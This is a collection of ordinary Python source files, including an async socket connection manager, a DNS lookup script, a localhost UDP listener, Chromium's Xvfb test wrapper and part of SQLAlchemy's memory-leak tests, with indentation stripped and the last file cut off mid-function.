# -*- coding: utf-8 -*
# Copyright: [CUP] - See LICENSE for details.
# Authors: Guannan Ma
"""
:description:
connection related module
1. There's only 1 thread reading/receiving data from the interface.
2. There may be more than 1 thread writing data into the network
queue, 1 thread per context (ip, port).
Notice that _do_write will only TRY to send out some data. It may
find the TCP/IP stack's SEND buffer-queue of the network
interface already full.
"""
import os
import copy
import socket
import select
import errno
import time
import threading
import traceback
try:
import Queue as queue # pylint: disable=F0401
except ImportError:
import queue # pylint: disable=F0401
import cup
from cup import log
from cup import err as cuperr
from cup.util import misc
from cup.util import threadpool
from cup.services import executor
from cup.net.async import msg as async_msg
from cup.net.async import context as sockcontext
__all__ = [
'CConnectionManager'
]
def _try_get_peer_info(sock):
try:
peer = sock.getpeername()
except socket.error as error:
peer = ('Error happened', str(error))
except Exception as error:
peer = ('_try_get_peer_info error happened', str(error))
return peer
# pylint: disable=R0902
class CConnectionManager(object):
"""
connaddr. Convert ip:port into a 64-bit hex.
"""
NET_RW_SIZE = 131072
# NET_RW_SIZE = 4096
class QueueError(Exception):
"""
internal queue error for CConnectionManager class
"""
def __init__(self, msg):
super(self.__class__, self).__init__()
self._msg = msg
def __repr__(self):
return self._msg
def __init__(self, ip, bindport, thdpool_param):
# TODO: Close idle socket after 30 mins with no data sent or received.
self._conns = {}
self._bind_port = bindport
self._bind_ip = ip
self._epoll = select.epoll()
self._stopsign = False
self._bind_sock = None
self._fileno2context = {}
self._context2fileno_peer = {}
self._peer2context = {}
min_thds, max_thds = thdpool_param
self._thdpool = threadpool.ThreadPool(
min_thds, max_thds, name='network_write_read')
self._recv_queue = queue.PriorityQueue(0)
self._stopsign = False
self._recv_msg_ind = 0
self._mlock = threading.Lock()
# _needack_context_queue
# infinite queue TODO: may change it in the future
self._needack_context_queue = queue.Queue()
self._dict_lock = threading.Lock()
self._needack_context_dict = {}
self._executor = executor.ExecutionService(
#int('queue_exec_thdnum'), # todo num?
#int('queue_delay_exe_thdnum') # todo num?
3,
4
)
self._type_man = async_msg.CMsgType()
self._type_man.register_types(async_msg.MSG_TYPE2NUM)
@classmethod
def _set_sock_params(cls, sock):
cup.net.set_sock_keepalive_linux(sock, 1, 3, 3)
cup.net.set_sock_linger(sock)
cup.net.set_sock_quickack(sock)
cup.net.set_sock_reusable(sock, True)
@classmethod
def _set_sock_nonblocking(cls, sock):
sock.setblocking(0)
@classmethod
def _epoll_write_params(cls):
return (select.EPOLLET | select.EPOLLOUT | select.EPOLLERR)
@classmethod
def _epoll_read_params(cls):
return (select.EPOLLET | select.EPOLLIN | select.EPOLLERR)
def get_needack_dict(self):
"""
get the needack dict
"""
return self._needack_context_dict
def push_msg2needack_queue(self, msg):
"""
push a msg into the needack queue
"""
log.debug('push ack ok msg into needack_queue.')
self._needack_context_queue.put(msg)
def bind(self):
"""
bind the ip:port
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._set_sock_params(sock)
sock.bind((self._bind_ip, self._bind_port))
self._set_sock_nonblocking(sock)
log.info(
'bind port info:(ip:%s, port:%s)' % (
self._bind_ip, self._bind_port
)
)
self._epoll.register(
sock.fileno(),
select.EPOLLIN | select.EPOLLET | select.EPOLLOUT | select.EPOLLERR
)
self._bind_sock = sock
def push_msg2sendqueue(self, msg):
"""
push msg into the send queue
"""
ret = 0
if msg is None:
log.warn('put a None into msg send queue. return')
ret = -1
return ret
valid, errmsg = msg.is_valid4send(msg)
if not valid:
log.error('failed to send msg as msg is not valid to send')
return -1
flag = msg.get_flag()
peer = msg.get_to_addr()[0]
new_created = False
context = None
sock = None
if isinstance(msg, async_msg.CNeedAckMsg):
log.debug('CNeedAckMsg is to be sent. msg_type:%d,'
'msg_flag:%d, msg_dest:%s, uniqid:%d' %
(
msg.get_msg_type(),
msg.get_flag(),
str(msg.get_to_addr()),
msg.get_uniq_id()
)
)
# no need head by default
# msg.set_need_head(b_need=False)
if msg.get_last_retry_time() is None:
msg.set_last_retry_time(time.time())
# if not in the self._needack_context_dict
if msg.get_retry_times() <= 0:
self._needack_context_queue.put(msg)
try:
context = self._peer2context[peer]
except KeyError:
log.info('To create a new context for the sock:{0}'.format(
peer)
)
self._mlock.acquire()
if peer not in self._peer2context:
sock = self.connect(peer)
if sock is not None:
context = sockcontext.CConnContext()
context.set_conn_man(self)
context.set_sock(sock)
context.set_peerinfo(peer)
fileno = sock.fileno()
self._peer2context[peer] = context
self._fileno2context[fileno] = context
self._context2fileno_peer[context] = (fileno, peer)
log.info('created context for the new sock')
ret = 0
try:
self._epoll.register(
sock.fileno(), self._epoll_write_params()
)
except Exception as error: # pylint: disable=W0703
log.warn(
'failed to register the socket fileno, err_msg:%s,'
'peerinfo:%s:%s. Falling back to epoll modify' %
(str(error), peer[0], peer[1])
)
self._epoll.modify(
sock.fileno(), self._epoll_write_params()
)
else:
log.error(
'failed to post msg. Connect failed. peer info:{0}.'
' msg_type:{1}'.format(
str(peer), msg.get_msg_type()
)
)
ret = -1
else:
context = self._peer2context[peer]
self._mlock.release()
else:
context = self._peer2context[peer]
if ret != 0:
return ret
if not context.is_detroying():
if context.put_msg(flag, msg) == 0:
ret = 0
# set up last modify
else:
ret = -1
log.debug('start handle new send.')
self._handle_new_send(context)
return ret
def connect(self, peer):
"""
:param peer:
ip:port
"""
log.info('to connect to peer:{0}'.format(peer))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._set_sock_params(sock)
try:
ret = sock.connect_ex(peer)
if ret != 0:
log.warn('connect failed, peer:{0}'.format(peer))
return None
if sock.getpeername() == sock.getsockname():
log.warn('connect failed, seems connected to self')
sock.close()
return None
self._set_sock_nonblocking(sock)
log.info('connect peer success')
return sock
except socket.error as error:
log.warn(
'failed to connect to %s:%s. Error:%s' %
(peer[0], peer[1], str(error))
)
sock.close()
return None
else:
sock.close()
return None
def _handle_new_conn(self, newsock, peer):
self._mlock.acquire()
self._set_sock_params(newsock)
self._set_sock_nonblocking(newsock)
context = sockcontext.CConnContext()
context.set_sock(newsock)
context.set_conn_man(self)
context.set_peerinfo(peer)
self._epoll.register(
newsock.fileno(), select.EPOLLIN | select.EPOLLET | select.EPOLLERR
)
self._fileno2context[newsock.fileno()] = context
self._peer2context[peer] = context
self._context2fileno_peer[context] = (newsock.fileno(), peer)
log.info('a new connection: %s:%s' % (peer[0], peer[1]))
self._mlock.release()
def cleanup_error_context(self, context):
"""clean up error context"""
def _cleanup_context(send_queue, peerinfo):
"""cleanup context"""
log.debug('to cleanup socket, peer:{0}'.format(peerinfo))
log.debug(
'cleanup: send_queue of socket size:{0}'.format(
send_queue.qsize()
)
)
while True:
try:
item = send_queue.get_nowait()
msg = item[2]
del msg
except queue.Empty:
break
if context is None:
return
self._mlock.acquire()
try:
peerinfo = context.get_peerinfo()
log.info(
'handle socket reset by peer, to close the socket:%s:%s' %
(peerinfo[0], peerinfo[1])
)
fileno_peer = self._context2fileno_peer[context]
try:
sock = context.get_sock()
sock.close()
context.set_sock(None)
except socket.error as error:
log.info(
'failed to close the socket, err_msg:%s' % str(error)
)
except Exception as error:
log.warn('failed to close socket:{0}'.format(error))
try:
self._epoll.unregister(fileno_peer[0])
except Exception as error: # pylint: disable=W0703
log.warn(
'epoll unregister error:%s, peerinfo:%s' %
(str(error), str(fileno_peer[1]))
)
del self._fileno2context[fileno_peer[0]]
del self._peer2context[fileno_peer[1]]
del self._context2fileno_peer[context]
log.info('socket closed')
except Exception as error:
pass
finally:
self._mlock.release()
# pylint: disable=W0212
self._thdpool.add_1job(_cleanup_context, context._send_queue, peerinfo)
def close_socket(self, msg, recv_socket):
"""
close socket by msg
"""
peer = None
try:
if not recv_socket:
peer = msg.get_to_addr()[0]
else:
peer = msg.get_from_addr()[0]
context = self._peer2context.get(peer)
if context is not None:
self.cleanup_error_context(context)
else:
log.warn('conn manager close socket failed:{0}'.format(
peer)
)
except Exception as err:
log.warn('failed to close socket:{1}, recv_socket:{0}'.format(
recv_socket, err)
)
return
def poll(self):
"""
start to poll
"""
self._thdpool.start()
self._executor.run()
log.info('thdpool and executor start')
misc.check_not_none(self._bind_sock)
self._bind_sock.listen(10)
self._executor.delay_exec(
2, # todo set the check_time to ?
self.do_check_msg_ack_loop,
urgency=executor.URGENCY_HIGH
)
while not self._stopsign:
try:
events = self._epoll.poll(1)
except IOError as err:
if err.errno == errno.EINTR:
return
raise err
# log.debug('start to poll')
for fileno, event in events:
# if it comes from the listen port, new conn
if fileno == self._bind_sock.fileno():
newsock, addr = self._bind_sock.accept()
self._handle_new_conn(newsock, addr)
elif event & select.EPOLLIN:
try:
self._handle_new_recv(self._fileno2context[fileno])
except KeyError:
log.info('socket already closed')
elif event & select.EPOLLOUT:
try:
self._handle_new_send(self._fileno2context[fileno])
except KeyError:
log.info('socket already closed')
elif (event & select.EPOLLHUP) or (event & select.EPOLLERR):
# FIXME: consider if we need to release net msg resources
if event & select.EPOLLHUP:
log.info('--EPOLLHUP--')
else:
log.info('--EPOLLERR--')
try:
self.cleanup_error_context(
self._fileno2context[fileno]
)
except KeyError:
log.info('socket already closed')
def dump_stats(self):
"""
dump stats
"""
self._thdpool.dump_stats()
def _async_stop(self, force_stop):
"""
to async stop thread pool and executor"""
stop_pool = threading.Thread(
target=self._thdpool.stop, args=(force_stop, )
)
stop_pool.start()
stop_executor = threading.Thread(
target=self._executor.stop, args=(force_stop, )
)
stop_executor.start()
stop_pool.join()
stop_executor.join()
def stop(self, force_stop=False):
"""
stop the connection manager
"""
log.info('to stop the connection manager')
self._stopsign = True
self._async_stop(force_stop)
log.info('connection manager stopped')
def get_recv_msg_ind(self):
"""
get recv msg ind
"""
tmp = self._recv_msg_ind
self._recv_msg_ind += 1
return tmp
def get_recv_queue(self):
"""
get recving_msg queue
"""
return self._recv_queue
def get_recv_msg(self):
"""
get recv msg from queue
"""
log.debug('to fetch a msg from recv_queue for handle function')
try:
# should use block-mode, otherwise the while loop in the upper
# code scope would spin and occupy a full cpu core.
msg = self._recv_queue.get(block=True, timeout=0.5)[1]
except queue.Empty as error:
msg = None
except TypeError as error:
log.error('type error, seems received SIGTERM, err:{0}'.format(
error)
)
msg = None
except Exception as error:
msg = 'Catch a error that I cannot handle, err_msg:%s' % error
log.error(msg)
log.error(type(error))
raise CConnectionManager.QueueError(msg)
return msg
def _handle_new_recv(self, context):
self._thdpool.add_1job(self.read, context)
# self.read(context)
def _finish_read_callback(self, succ, result):
context = result
if context.is_detroying():
# destroy the context and socket
context.release_readlock()
try:
self.cleanup_error_context(context)
except KeyError:
pass
else:
self._epoll.modify(
context.get_sock().fileno(), select.EPOLLIN | select.EPOLLET
)
context.release_readlock()
def read(self, context):
"""
read with conn context
"""
if context.is_detroying():
log.debug('The context is being destroyed. return')
return
if not context.try_readlock():
return
try:
self._do_read(context)
self._finish_read_callback(True, context)
except Exception as error:
context.to_destroy()
log.info('read error occur, error type:{0}, content:{1}'.format(
type(error), error)
)
self.cleanup_error_context(context)
log.warn(traceback.format_exc())
self._finish_read_callback(False, context)
def _do_read(self, context):
sock = context.get_sock()
data = None
context.move2recving_msg()
while self._stopsign is not True:
try:
data = sock.recv(self.NET_RW_SIZE)
except socket.error as error:
err = error.args[0]
if err == errno.EAGAIN:
log.debug(
'EAGAIN happened, peer info %s' %
context.get_context_info()
)
return context
elif err == errno.EWOULDBLOCK:
log.info(
'EWOULDBLOCK happened, context info %s' %
context.get_context_info()
)
return context
else:
log.debug(
'Socket error happened, error:%s, peer info %s' %
(str(error), context.get_context_info())
)
context.to_destroy()
return context
except Exception as error:
log.critical(
'Socket error happened, error:%s, peer info %s' %
(str(error), context.get_context_info())
)
context.to_destroy()
return context
data_len = len(data)
if data_len == 0:
# socket closed by peer
context.to_destroy()
return context
context.do_recv_data(data, data_len)
del data
def _finish_write_callback(self, succ, result):
"""finish write callback"""
context = result
# You cannot do things below as getpeername will block if the conn
# has problem!!!!! - Guannan
# try:
# context.get_sock().getpeername()
# except socket.error as error:
# log.debug('Seems socket failed to getpeername:%s' % str(error))
# context.to_destroy()
if context is not None and context.is_detroying():
# destroy the context and socket
context.release_writelock()
try:
self.cleanup_error_context(context)
# pylint: disable=W0703
except Exception as error:
log.warn('context destroying encounters error,'
'skip it:{0}'.format(error)
)
else:
# log.debug('to epoll modify')
epoll_write_params = self._epoll_write_params()
context.release_writelock()
# the context has locked the writing.
# guarantee there's only 1 thread for context writing.
def _handle_new_send(self, context):
"""
handle new send message
"""
if context is None:
log.debug('context is None')
return
self._thdpool.add_1job(self.add_write_job, context)
def _do_write(self, context):
"""write into interface sending buffer"""
sock = context.get_sock()
msg = context.try_move2next_sending_msg()
if msg is None:
log.debug('send queue is empty, quit the _do_write thread')
return context
# log.debug('To enter write loop until eagin')
# pylint:disable=w0212
while not self._stopsign:
data = msg.get_write_bytes(self.NET_RW_SIZE)
log.debug('msg get_write_bytes_len to be sent: %d' % len(data))
try:
succ_len = sock.send(data)
msg.seek_write(succ_len)
except cuperr.AsyncMsgError as error:
log.debug('has seek out of msg len, continue')
except socket.error as error:
err = error.args[0]
if err == errno.EAGAIN:
log.debug(
'EAGAIN happened, context info %s' %
context.get_context_info()
)
return context
elif err == errno.EWOULDBLOCK:
log.debug(
'EWOULDBLOCK happened, context info %s' %
context.get_context_info()
)
return context
else:
log.warn(
'Socket error happened, but it is not EAGAIN. error:%s,\
context info %s, errno:%s' %
(str(error), context.get_context_info(), err)
)
context.to_destroy()
break
except Exception as error:
log.error(
'Socket error happened, error:%s, context info %s, trace:%s' %
(str(error), context.get_context_info(), traceback.format_exc())
)
context.to_destroy()
break
finally:
del data
if msg.is_msg_already_sent():
log.info('sent out a msg, msg_type:{0}'.format(msg.get_msg_type()))
# if we have successfully send out a msg. Then move to next one
msg = context.try_move2next_sending_msg()
if msg is None:
break
return context
def add_write_job(self, context):
"""
add network write into queue
"""
if context is None:
return
try:
peerinfo = context.get_peerinfo()
# pylint: disable=W0703
except Exception as error:
log.info('failed to get peerinfo, return')
return
if not context.try_writelock():
log.debug(
'Another thread is writing the context, return. '
'Peerinfo:%s:%s' %
(peerinfo[0], peerinfo[1])
)
return
if context.is_detroying():
log.info(
'The context is being destroyed, i will do nothing. '
'Peerinfo:%s:%s' %
(peerinfo[0], peerinfo[1])
)
return
try:
# log.debug('write in add_write_job')
self._do_write(context)
self._finish_write_callback(True, context)
# pylint: disable=W0703
except Exception as error:
log.debug(
'seems an error happened for context:%s Peerinfo:%s:%s\n, %s' %
(str(error), peerinfo[0], peerinfo[1], traceback.format_exc())
)
self._finish_write_callback(False, context)
def _get_resend_msg_key(self, ip, port, uniq_id):
"""generate resend msg key"""
key = '{0}_{1}_{2}'.format(ip, port, uniq_id)
return key
def _check_needack_queue(self):
"""
check needack_queue
"""
log.debug('start check needack_queue')
msg_item = None
ack_flag = async_msg.MSG_FLAG2NUM['FLAG_ACK']
while True:
msg_item = None
try:
msg_item = self._needack_context_queue.get_nowait()
except queue.Empty:
log.debug('no need ack msg found yet')
break
ack_success = False
toaddr = None
uniq_id = msg_item.get_uniq_id()
toaddr = msg_item.get_to_addr()[0]
if msg_item.get_flag() & ack_flag == ack_flag:
# if msg_item is a ack msg
log.info(
'msgack received, stop resending '
'msguniq_id:{0}'.format(uniq_id)
)
msg_item.set_resend_flag(async_msg.MSG_RESEND_SUCCESS)
toaddr = msg_item.get_from_addr()[0]
ack_success = True
to_ip = toaddr[0]
to_port = toaddr[1]
msg_key = self._get_resend_msg_key(to_ip, to_port, uniq_id)
if ack_success:
if msg_key in self._needack_context_dict:
last_msg = self._needack_context_dict[msg_key]
del self._needack_context_dict[msg_key]
self._executor.queue_exec(
last_msg.get_callback_function(),
executor.URGENCY_NORMAL,
last_msg, True
)
else:
log.warn(
'got duplicate ack-msg, msg_id:{0}'.format(uniq_id)
)
continue
# not ack_success + not in context_dict
if msg_key not in self._needack_context_dict:
self._needack_context_dict[msg_key] = msg_item
time_out_list = []
for key in self._needack_context_dict.keys():
msg_item = self._needack_context_dict[key]
msg_flag = msg_item.get_resend_flag()
msg_info = 'msg_type:%d, msg_flag:%d, msg_dest:%s,uniqid:%d' % (
msg_item.get_msg_type(),
msg_item.get_flag(),
str(msg_item.get_to_addr()),
msg_item.get_uniq_id()
)
if msg_flag == async_msg.MSG_RESEND_SUCCESS:
time_out_list.append(key)
log.debug(
'del succ-msg from resending queue: {0}'.format(msg_info)
)
elif msg_flag == async_msg.MSG_RESENDING_FLAG:
msg_total_timeout = msg_item.get_total_timeout()
# if msg resending timeouts
if msg_total_timeout <= 0:
msg_item.set_resend_flag(async_msg.MSG_TIMEOUT_TO_DELETE)
log.error(
'timeout, failed to get ack for netmsg:{0}'.format(
msg_info)
)
time_out_list.append(key)
else:
msg_last_retry_time = msg_item.get_last_retry_time()
msg_retry_interval = msg_item.get_retry_interval()
now = time.time()
elapse_time = now - msg_last_retry_time
if elapse_time >= msg_retry_interval:
# update total_timeout
msg_item.set_total_timeout(
msg_total_timeout - elapse_time
)
msg_item.set_last_retry_time(now)
log.info('to resend CNeedAckMsg: {0}'.format(msg_info))
msg_item.pre_resend()
msg_item.add_retry_times()
self.push_msg2sendqueue(msg_item)
for key in time_out_list:
msg_item = self._needack_context_dict[key]
del self._needack_context_dict[key]
self._executor.queue_exec(
msg_item.get_callback_function(),
executor.URGENCY_NORMAL,
msg_item, False
)
def do_check_msg_ack_loop(self):
"""
check msg ack loop
"""
log.debug('start check msg ack info.')
self._check_needack_queue()
self._executor.delay_exec(
3, # todo set the check_time to ?
self.do_check_msg_ack_loop,
urgency=executor.URGENCY_HIGH
)
# vi:set tw=0 ts=4 sw=4 nowrap fdm=indent
|
dns_v2.py
|
import threading
import socket
import datetime
def resolveDns(hostnames):
for host in hostnames:
try:
print(f"{host}: {socket.gethostbyname(host)}")
except Exception as e:
print(f"{host}: {e}")
continue
if __name__ == "__main__":
filename = "hostnames.txt"
with open(filename) as file:
hostnames = file.readlines()
hostnames = [line.rstrip() for line in hostnames]
start = datetime.datetime.now()
threads = list()
chunksize = 100
chunks = [hostnames[i:i + chunksize] for i in range(0, len(hostnames), chunksize)]
for chunk in chunks:
x = threading.Thread(target=resolveDns, args=(chunk,))
threads.append(x)
x.start()
for thread in threads:
thread.join()
end = datetime.datetime.now()
duration = end - start
print(" ")
print(f"Time taken: {duration}")
print("")
|
MyMultiportUdpListener.py
|
#!/usr/bin/python3
import time
import threading
import socketserver
class MyMultiportUdpListener:
def __init__(self, portlist):
self.portlist = portlist
self.start_listeners()
def start_udpserv(self, port):
self.MySinglePortListener(('127.0.0.1', port), self)
def start_listeners(self):
# create threads to listen on each port
self.threads = [
threading.Thread(target=self.start_udpserv, args=(p, ))
for p in self.portlist
]
# start them
print('starting threads...')
for t in self.threads:
t.daemon = True  # daemon threads do not block interpreter exit
t.start()
def multiport_callback(self, data, server_address):
print(f'got some data {data} from {server_address}\n')
# store it, etc do as you wish
class MySinglePortListener(socketserver.ThreadingUDPServer):
class MyUDPHandler(socketserver.BaseRequestHandler):
def handle(self):
data = self.request[0].strip()
socket = self.request[1]
# print(
# f'client {self.client_address}\n\twrote {data}\n\tto {self.server.server_address}'
# )
# send back message in uppercase as confirmation (comment out if not needed)
# socket.sendto(data.upper(), self.client_address)
# call server callback function with data
self.server.single_port_callback(data)
def __init__(self, server_address, multiport_listener):
# store reference to parent class
self.multiport_listener = multiport_listener
# turn on allow reuse ports
socketserver.ThreadingUDPServer.allow_reuse_address = 1
# instantiate server
socketserver.ThreadingUDPServer.__init__(self, server_address,
self.MyUDPHandler)
# now serve forever
print(f'now listening on {self.server_address}')
self.serve_forever()
def single_port_callback(self, data):
# do something single port wise if you want here...
# otherwise pass data to higher server
self.multiport_listener.multiport_callback(data,
self.server_address)
if __name__ == '__main__':
# ports to listen to
ports = [6941, 6942, 6943]
# listen
MyMultiportUdpListener(portlist=ports)
# stay active until ctrl+c input
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
print('exiting now...')
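# To exercise the listener from another shell (illustration only, using one of
# the ports configured above):
#
#     python3 -c "import socket; socket.socket(socket.AF_INET, socket.SOCK_DGRAM).sendto(b'hello', ('127.0.0.1', 6941))"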
|
xvfb.py
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs tests with Xvfb and Openbox on Linux and normally on other platforms."""
import os
import os.path
import platform
import signal
import subprocess
import sys
import threading
import test_env
def _kill(proc, send_signal):
"""Kills |proc| and ignores exceptions thrown for non-existent processes."""
try:
os.kill(proc.pid, send_signal)
except OSError:
pass
def kill(proc, timeout_in_seconds=10):
"""Tries to kill |proc| gracefully with a timeout for each signal."""
if not proc or not proc.pid:
return
_kill(proc, signal.SIGTERM)
thread = threading.Thread(target=proc.wait)
thread.start()
thread.join(timeout_in_seconds)
if thread.is_alive():
print >> sys.stderr, 'Xvfb running after SIGTERM, trying SIGKILL.'
_kill(proc, signal.SIGKILL)
thread.join(timeout_in_seconds)
if thread.is_alive():
print >> sys.stderr, 'Xvfb running after SIGTERM and SIGKILL; good luck!'
def run_executable(cmd, env, stdoutfile=None):
"""Runs an executable within Xvfb on Linux or normally on other platforms.
If |stdoutfile| is provided, symbolization via script is disabled and stdout
is written to this file as well as to stdout.
Returns the exit code of the specified commandline, or 1 on failure.
"""
# It might seem counterintuitive to support a --no-xvfb flag in a script
# whose only job is to start xvfb, but doing so allows us to consolidate
# the logic in the layers of buildbot scripts so that we *always* use
# xvfb by default and don't have to worry about the distinction, it
# can remain solely under the control of the test invocation itself.
use_xvfb = True
if '--no-xvfb' in cmd:
use_xvfb = False
cmd.remove('--no-xvfb')
if sys.platform == 'linux2' and use_xvfb:
if env.get('_CHROMIUM_INSIDE_XVFB') == '1':
openbox_proc = None
xcompmgr_proc = None
try:
# Some ChromeOS tests need a window manager.
openbox_proc = subprocess.Popen('openbox', stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env)
# Some tests need a compositing wm to make use of transparent visuals.
xcompmgr_proc = subprocess.Popen('xcompmgr', stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env)
return test_env.run_executable(cmd, env, stdoutfile)
except OSError as e:
print >> sys.stderr, 'Failed to start Xvfb or Openbox: %s' % str(e)
return 1
finally:
kill(openbox_proc)
kill(xcompmgr_proc)
else:
env['_CHROMIUM_INSIDE_XVFB'] = '1'
if stdoutfile:
env['_XVFB_EXECUTABLE_STDOUTFILE'] = stdoutfile
xvfb_script = __file__
if xvfb_script.endswith('.pyc'):
xvfb_script = xvfb_script[:-1]
# TODO(crbug.com/932240): Propagate signals properly.
return subprocess.call([
'xvfb-run', '-a', "--server-args=-screen 0 "
"1280x800x24 -ac -nolisten tcp -dpi 96 "
"+extension RANDR", xvfb_script] + cmd, env=env)
else:
return test_env.run_executable(cmd, env, stdoutfile)
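# Example invocations (the test binary path is hypothetical):
#
#     xvfb.py out/Release/unit_tests            # wrap the run in xvfb-run on Linux
#     xvfb.py out/Release/unit_tests --no-xvfb  # run directly, without Xvfb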
def main():
USAGE = 'Usage: xvfb.py [command [--no-xvfb] args...]'
if len(sys.argv) < 2:
print >> sys.stderr, USAGE
return 2
# If the user still thinks the first argument is the execution directory then
# print a friendly error message and quit.
if os.path.isdir(sys.argv[1]):
print >> sys.stderr, (
'Invalid command: \"%s\" is a directory' % sys.argv[1])
print >> sys.stderr, USAGE
return 3
stdoutfile = os.environ.get('_XVFB_EXECUTABLE_STDOUTFILE')
if stdoutfile:
del os.environ['_XVFB_EXECUTABLE_STDOUTFILE']
return run_executable(sys.argv[1:], os.environ.copy(), stdoutfile)
if __name__ == "__main__":
sys.exit(main())
|
test_memusage.py
|
import decimal
import gc
import itertools
import multiprocessing
import weakref
import sqlalchemy as sa
from sqlalchemy import ForeignKey
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import testing
from sqlalchemy import Unicode
from sqlalchemy import util
from sqlalchemy.engine import result
from sqlalchemy.orm import aliased
from sqlalchemy.orm import clear_mappers
from sqlalchemy.orm import configure_mappers
from sqlalchemy.orm import declarative_base
from sqlalchemy.orm import join as orm_join
from sqlalchemy.orm import joinedload
from sqlalchemy.orm import Load
from sqlalchemy.orm import relationship
from sqlalchemy.orm import selectinload
from sqlalchemy.orm import Session
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm import subqueryload
from sqlalchemy.orm.session import _sessions
from sqlalchemy.processors import to_decimal_processor_factory
from sqlalchemy.sql import column
from sqlalchemy.sql import util as sql_util
from sqlalchemy.sql.visitors import cloned_traverse
from sqlalchemy.sql.visitors import replacement_traverse
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.fixtures import fixture_session
from sqlalchemy.testing.schema import Column
from sqlalchemy.testing.schema import Table
from sqlalchemy.testing.util import gc_collect
from ..orm import _fixtures
class A(fixtures.ComparableEntity):
pass
class B(fixtures.ComparableEntity):
pass
class ASub(A):
pass
def assert_cycles(expected=0):
def decorate(fn):
def go():
fn() # warmup, configure mappers, caches, etc.
gc_collect()
gc_collect()
gc_collect() # multiple calls seem to matter
# gc.set_debug(gc.DEBUG_COLLECTABLE)
try:
return fn() # run for real
finally:
unreachable = gc_collect()
assert unreachable <= expected
gc_collect()
return go
return decorate
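# Illustrative use of assert_cycles (mirrors the tests further below): wrap a
# zero-argument callable; the decorated call runs once as a warmup, then runs
# again and asserts that gc reports no more than `expected` unreachable
# (cyclic) objects.
#
#     @assert_cycles()
#     def check():
#         list(range(10))
#     check()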
def profile_memory(
maxtimes=250, assert_no_sessions=True, get_num_objects=None
):
def decorate(func):
# run the test N times. if length of gc.get_objects()
# keeps growing, assert false
def get_objects_skipping_sqlite_issue():
# pysqlite keeps adding weakref objects which only
# get reset after 220 iterations. We'd like to keep these
# tests under 50 iterations and ideally about ten, so
# just filter them out so that we get a "flatline" more quickly.
if testing.against("sqlite+pysqlite"):
return [
o
for o in gc.get_objects()
if not isinstance(o, weakref.ref)
]
else:
return gc.get_objects()
def profile(queue, func_args):
# give testing.db a brand new pool and don't
# touch the existing pool, since closing a socket
# in the subprocess can affect the parent
testing.db.pool = testing.db.pool.recreate()
gc_collect()
samples = []
max_ = 0
max_grew_for = 0
success = False
until_maxtimes = 0
try:
while True:
if until_maxtimes >= maxtimes // 5:
break
for x in range(5):
try:
func(*func_args)
except Exception as err:
queue.put(
(
"result",
False,
"Test raised an exception: %r" % err,
)
)
raise
gc_collect()
samples.append(
get_num_objects()
if get_num_objects is not None
else len(get_objects_skipping_sqlite_issue())
)
if assert_no_sessions:
assert len(_sessions) == 0, "%d sessions remain" % (
len(_sessions),
)
# queue.put(('samples', samples))
latest_max = max(samples[-5:])
if latest_max > max_:
queue.put(
(
"status",
"Max grew from %s to %s, max has "
"grown for %s samples"
% (max_, latest_max, max_grew_for),
)
)
max_ = latest_max
max_grew_for += 1
until_maxtimes += 1
continue
else:
queue.put(
(
"status",
"Max remained at %s, %s more attempts left"
% (max_, max_grew_for),
)
)
max_grew_for -= 1
if max_grew_for == 0:
success = True
break
except Exception as err:
queue.put(("result", False, "got exception: %s" % err))
else:
if not success:
queue.put(
(
"result",
False,
"Ran for a total of %d times, memory kept "
"growing: %r" % (maxtimes, samples),
)
)
else:
queue.put(("result", True, "success"))
def run_plain(*func_args):
import queue as _queue
q = _queue.Queue()
profile(q, func_args)
while True:
row = q.get()
typ = row[0]
if typ == "samples":
print("sample gc sizes:", row[1])
elif typ == "status":
print(row[1])
elif typ == "result":
break
else:
assert False, "can't parse row"
assert row[1], row[2]
# return run_plain
def run_in_process(*func_args):
queue = multiprocessing.Queue()
proc = multiprocessing.Process(
target=profile, args=(queue, func_args)
)
proc.start()
while True:
row = queue.get()
typ = row[0]
if typ == "samples":
print("sample gc sizes:", row[1])
elif typ == "status":
print(row[1])
elif typ == "result":
break
else:
assert False, "can't parse row"
proc.join()
assert row[1], row[2]
return run_in_process
return decorate
def assert_no_mappers():
clear_mappers()
gc_collect()
class EnsureZeroed(fixtures.ORMTest):
def setup_test(self):
_sessions.clear()
clear_mappers()
# enable query caching, however make the cache small so that
# the tests don't take too long. issues w/ caching include making
# sure sessions don't get stuck inside of it. However it will
# make tests like test_mapper_reset take a long time because mappers
# are very much a part of what's in the cache.
self.engine = engines.testing_engine(
options={"use_reaper": False, "query_cache_size": 10}
)
class MemUsageTest(EnsureZeroed):
__tags__ = ("memory_intensive",)
__requires__ = ("cpython", "no_windows")
def test_type_compile(self):
from sqlalchemy.dialects.sqlite.base import dialect as SQLiteDialect
cast = sa.cast(column("x"), sa.Integer)
@profile_memory()
def go():
dialect = SQLiteDialect()
cast.compile(dialect=dialect)
go()
@testing.requires.cextensions
def test_DecimalResultProcessor_init(self):
@profile_memory()
def go():
to_decimal_processor_factory({}, 10)
go()
@testing.requires.cextensions
def test_DecimalResultProcessor_process(self):
@profile_memory()
def go():
to_decimal_processor_factory(decimal.Decimal, 10)(1.2)
go()
@testing.requires.cextensions
def test_cycles_in_row(self):
tup = result.result_tuple(["a", "b", "c"])
@profile_memory()
def go():
obj = {"foo": {}}
obj["foo"]["bar"] = obj
row = tup([1, 2, obj])
obj["foo"]["row"] = row
del row
go()
def test_ad_hoc_types(self):
"""test storage of bind processors, result processors
in dialect-wide registry."""
from sqlalchemy.dialects import mysql, postgresql, sqlite
from sqlalchemy import types
eng = engines.testing_engine()
for args in (
(types.Integer,),
(types.String,),
(types.PickleType,),
(types.Enum, "a", "b", "c"),
(sqlite.DATETIME,),
(postgresql.ENUM, "a", "b", "c"),
(types.Interval,),
(postgresql.INTERVAL,),
(mysql.VARCHAR,),
):
@profile_memory()
def go():
